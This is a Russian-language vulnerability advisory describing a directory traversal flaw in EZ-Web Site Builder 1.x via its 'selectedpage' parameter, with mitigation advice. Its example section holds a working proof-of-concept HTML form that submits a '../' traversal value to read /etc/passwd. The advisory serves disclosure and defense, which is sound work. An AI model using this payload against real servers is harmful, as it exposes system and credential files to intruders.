Доступ к произвольным файлам на системе в EZ-Web Site Builder

Дата публикации:
05.09.2003
Всего просмотров:
751
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
EZ-Web Site Builder 1.x

Уязвимые версии: EZ-Web Site Builder 1.x

Описание: Уязвимость обнаружена в EZ-Web Site Builder. Удаленный пользователь может получить доступ к произвольным файлам на уязвимом сервере.

Программа должным образом не обрабатывает параметр "selectedpage" перед открытием файла, используя встроенный редактор. В результате удаленный пользователь может представить специально обработанное значение для параметра "selectedpage", чтобы получить доступ к файлам, расположенным вне wwwroot каталога.

Пример/Эксплоит:

<html><body><p><center>
<b>Mein 31337 Exploit :-P</b><br>
<form action="http://targethost.com/cgi-bin/sbcgi/sitebuilder.cgi" 
method=POST>
<input type="hidden" name="username" value="targetuser">
<input type="hidden" name="password" value="targetpassword">
<input type="hidden" name="selectedpage" 
value="../../../../../../../../../../etc/passwd">
<p><input type="submit" name="action" value="Yes - Use Advanced Edi
tor">
<p><input type="submit" value="Return to Site Builder">
</form>
</center></body></html>

URL производителя: http://newerascripts.com/

Решение:

Ограничьте доступ к сайту доверенным пользователям. Отредактируйте исходный код, чтобы фильтровались злонамеренные символы. Используйте альтернативное программное обеспечение.

Ссылки: Directory Traversal in SITEBUILDER - v1.4
или введите имя

CAPTCHA